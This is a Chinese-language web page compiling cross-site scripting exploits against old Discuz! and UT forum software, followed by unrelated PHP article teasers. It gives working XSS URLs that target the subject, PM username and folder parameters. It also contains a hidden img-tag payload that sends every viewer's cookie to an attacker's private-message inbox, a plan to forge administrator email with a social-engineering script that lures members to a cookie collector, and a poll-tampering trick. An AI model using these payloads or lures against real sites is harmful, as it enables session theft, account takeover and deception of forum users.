PHP著名开源论坛:Discuz!跨站大全

在discuz!的发贴、回贴、PM等中的subject都没有经过过滤,所以也可以添加代码。

例如

http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22

效果是首先弹出自己的cookie

利用方法:把上述代码放置到img中。

适用版本:discuz!2.x

discuz!3.x

一种利用discuz!2.0漏洞进行欺骗获得cookie的尝试

通过测试XXXFan论坛的PM功能存在一个安全漏洞,具体描述如下:

XXXFan的给某个会员发送悄悄的链接如下(假定这个会员名字为XXXFan)

http://XXX/pm.php?action=send&username=XXXFan

因为论坛程序对会员名字没有进行过滤,而是直接显示在发送到栏目中(TO:),所以可以在名字后面加上script代码。例如

http://XXX/pm.php?action=send&username=XXXFan ";><script>alert(document..cookie)</script><b%20"

上面的链接点击以后首先弹出的是自己的cookie内容。

当然我们可以先在自己的站点上构造一个程序来收集cookie,类似于

getcookie.php?cookie=

但是如何来诱使会员点击呢,如果简单的放在论坛上,太容易被识别。所以可以利用discuz论坛程序的另外一个功能,“帖子介绍给朋友”功能。

因为discuz的这个功能对填写的emial地址没有进行任何过滤、辨别和模版,可以伪造任何人给别人发信,安全性很高。利用这个功能我们就可以伪造ExploitFan的管理员给某个会员发一封信,诱使会员点击我们准备的URL,如果诱使就看自己的手段了,例如可以说“论坛正在测试新功能,请您协助点击上面地址,我们会在后台记录您的点击在合适的时间会给您增加积分以做奖励”等等。

因为链接地址是XXXFan的,而且发信人和邮件地址都是XXXFan的官方地址,所以可信度非常高,而且不会留下任何把柄。当然为了更高的安全性,可以在<script>里的内容加密,以进一步增加隐蔽性。

至于得到cookie如何做,可以尝试cookie欺骗或者是暴力破解MD5密码

本方法适用于大部分使用discuz2.0的论坛,至于discuz3.0的利用方法请参与在我以前发表的discuz!悄悄话漏洞

【BUG】Discuz!投票的BUG

投票可以用

misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n

(n为选项,从0开始)

的方式通过URL来直接投票

但是如果n>最大选项呢,嘻嘻~

照样提交成功,不过增加了一个标题为空的选项

效果见:

http://discuz.net/viewthread.php?tid=20020&sid=dymPEc

(那个最后的空白的是我刚加的)

该漏洞存在的版本:

Discuz!3.X

Discuz!2.X(可能,没有测试过)

Discuz!的代码漏洞

这是接着昨天发现的漏洞所展开的,第一发现者(PK0909)。

具体的描述就不说了,下面是一个简单的测试代码。

http://www.xxxx.net/phpbbs/post.php?action...%3C%2Fscript%3E

上面的代码是显示出自己的cookie

下面是在某个比较有名的论坛的测试代码,无论谁察看该网页都会把cookie送到指定的会员短信箱里,隐蔽性很好,就是如果有人引用你的贴,哈哈~这里都会跑出来,露馅了

[ img]http://xxx.com/xx.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(document..cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img]

发现discuz!UT 跨域站点的脚本漏洞--短消息篇有关跨域站点的脚本漏洞,已经算是非常平成并普遍的漏洞了。

有关具体的消息可以参阅:

http://www.cert.org/advisories/CA-2000-02.html

下面针对Discuz、UT论坛程序的悄悄话部分加以说明

漏洞适应版本:

Discuz1.X

Discuz!2.0(0609,0820版)

Discuz!3.X

UT 1.0

漏洞描述:

discuz!给指定会员发送悄悄话使用的是类似http://www.XXXX.net/phpbbs/pm.php?action=send&username=name 的语句,但是name没有经过过滤直接显示在发送短消息的页面中,这就给偷cookie或者更严重的破坏打开了方便之门。

Discuz!3.X已经改为http://XXX.net/pm.php?action=send&uid=XXXX类似的语句,避免了这个漏洞,但是在选择短信文件夹的时候却没有经过过滤。同样产生了上面的漏洞

http://www.XXXX.net/phpbbs/pm.php?action=s...d&username=name %22%3E%3Cscript%3Ealert(document..cookie)%3C/script%3E%3Cb%22[/url]

,上面的例子是显示自己的cookie。(针对Discuz!1.X Discuz!2.X)

http://XXX.net/pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22

显示自己的cookie。(针对Discuz!3.X)

UT虽然在主题上经过了过滤,也就是说把%27转换为';但是其收件人却没有过滤,所以同样有类似的漏洞。例子略。(在不同的UT论坛上发现其代码不尽相同,但是总的来说都有类似的漏洞)

危害度:中弱

预防办法:

点击超级链接时请注意其真实内容。更多的安全补丁请密切关注官方论坛。

(0)

相关推荐

  • 10款实用的PHP开源工具

    在开发工作中,使用合适的工具可以最大化地提高效率.此外,大量的开源项目也节省了开发者重复"造轮"的时间,使得开发者可以专注于业务的实现. 本文介绍10款非常实用且开源的PHP开发辅助工具,希望对你有所帮助. 1. Debugbar DebugBar是一个免费和开源的应用,能够集成至任何PHP项目中,并收集和展示分析数据.它有没有任何依赖,支持Ajax请求,包括常用开发库的通用数据采集器和收集器. 2. Monsta FTP Monsta FTP是一个基于Web并且开源的FTP应用,它采

  • 几款免费开源的不用数据库的php的cms

    1.MuCMS一个小型,平台独立的内容管理系统适用于非交互式网站(网站只发布信息).它对系统要求非常低,只需要Apache+PHP.没有使用数据库.它具有安全,快速,易用等特点.官方网站http://mucms.taggedzi.com/index.php 2.Synergiser是一个采用模块化设计,不需要依赖数据库的内容管理系统(CMS).它还包含一个简单的blog系统,一个简单的Menu,一个 RSS聚合器,一个用于处理静态页面的内容管理面板和一个模板系统.官方网站http://www.f

  • php+mysql开源XNA 聚合程序发布 下载

    PHP+MYSQL (php5 +mysql 4.1) 的一个简单的开源XNA聚合,效果如:http://xna.spvrk.com 一个简单的聚合程序,用phpmyadmin 导入cms_xna.sql,修改config.inc.php中的数据库地址即可使用,后台为/admin,因时间关系,暂时没写用户名和密码验证,大家可免费使用本程序,也可在本程序的基础上二次开发,但不得用于任何商业用途,不提供技术支持,但有好的新版本也可回馈给我,本程序使用通用公共授权GPL3,想做成一个开源的项目,不知有

  • PHP 飞信好友免费短信API接口开源版

    1,支持群发 (如果需要群发多号用英文逗号(,)分隔(159..,159..)) 2,支持POST或GET方式提交数据 本站接口: http://api.heqee.com/fetion/?username=飞信手机号码&passowrd=飞信手机密码&to=接收人号码&message=短信内容 或者 http://api.heqee.com/fetion/?u=飞信手机号码&p=飞信手机密码&t=接收人号码&m=短信内容 您也可以下载源码放在自己的网站上

  • 学习php开源项目的源码指南

    一.先把源代码安装起来,结合它的文档和手册,熟悉其功能和它的应用方式. 二.浏览源代码的目录结构,了解各个目录的功能. 三.经过以上两步后相信你对这个开源的产品有了一个初步的了解了,那现在就开始分析它的源码吧.这一步我们开始分析源代码框架.例如入口方式是单入口还是多入口,页面之间的调用规则,能根据规则找出某个功能用到的页面. 四.熟悉源代码的代码写作风格,例如缩进方式,排版格式等. 五.熟悉一下源代码用到的数据库和表,可以参考它的技术支持文档. 六.经过以上几步相信大家已经对这份源代码有了更深刻

  • 10款PHP开源商城系统汇总介绍

    在当今经济危机的大环境下,网上购物越来越来吃香,网上开店成本低,快捷方便,出名的电子商务网站有淘宝,拍拍,Ebay或是最新的百度有啊,这些网站都提供开店的机会,如果是想自己搭建购物平台,可以从下面选择适合你的电子商务购物平台.有国外的和国内的. osCommerce osCommerce 是一套基于GNU GPL授权的开源在线购物电子商务解决方案.该系统具有易于操作的可视化安装界面.完善的前台商品展示和户在线购物车功能.强大的后台管理和维护功能模块简单易用.70,000人的官方社区用户和活跃的论

  • 开源php中文分词系统SCWS安装和使用实例

    一.SCWS简介 SCWS 是 Simple Chinese Word Segmentation 的首字母缩写(即:简易中文分词系统).这是一套基于词频词典的机械式中文分词引擎,它能将一整段的中文文本基本正确地切分成词. 词是中文的最小语素单位,但在书写时并不像英语会在词之间用空格分开, 所以如何准确并快速分词一直是中文分词的攻关难点.SCWS 采用纯 C 语言开发,不依赖任何外部库函数,可直接使用动态链接库嵌入应用程序, 支持的中文编码包括 GBK.UTF-8 等.此外还提供了 PHP 扩展模

  • 建站常用13种PHP开源CMS比较

    1.曼波-MAMBO,一个国外的CMS系统 ,功能 很强大,支持添加很多组件,模块;拥有丰富的模板 官方:http://www.mamboserver.com 2.凌波-Limbo(Lite Mambo),顾名思义,是从Mambo演化而来.其目的是在继承Mambo一些强大的功能和特性的同时,对原Mambo系统进行简化,使之变得更加轻便小巧.同时,Limbo支持三种安装方式:TXT.Mysql.SQLite. 官方:http://www.limbo-cms.com 3.HBcms :一个以PHP官

  • 使用PHP把HTML生成PDF文件的几个开源项目介绍

    利用PHP编码生成PDF文件是一个非常耗时的工作.在早期,开发者使用PHP并借助FPDF来生成PDF文件.但是如今,已经有很多函数库可以使用了,并且能够从你提供的HTML文件生成PDF文档.这让原先耗时的工作变得非常简单了. FPDF是很早就被使用的,其特点如下: FPDF FPDF是一个允许使用纯PHP生成PDF文档的PHP类,换句话说,没有使用PDFlib 函数库.FPDF中的F代表免费和自由:你可以在任何情况下使用,并且支持自定义,来满足你特定的需求 特点: 1.可以选择单元.页面格式和边

  • 两个开源的Php输出Excel文件类

    1.php-excel php-excel is a very simple library for generating excel documents from php on-the-fly. http://code.google.com/p/php-excel/我们下载http://www.jb51.net/codes/24319.html2.PHPExcel Project providing a set of classes for the PHP programming langua

  • PHP 开源框架22个简单简介

    那么,是什么让PHP如此流行?PHP 如此之流行是因为比起别的语言来,它更容易学习,网上有一大堆相当相当不错的PHP教程可以让你快速地马上就可以进行Web程序的开发.虽然PHP是是简单的,而且是容易上手的,但用它编程还是有点麻烦,尤其是一些反复在用的功能.不过,幸运的是,很多开发团队早就注意到了这点,现在在网上,PHP有许多的可以信任的PHP Framework 可以缩短我们的开发时间.这些框架被一个巨大的社区所支持,因些,如果你有什么问题的话,一定会有人乐意帮你去解决. 废话少说,让我们来看看

随机推荐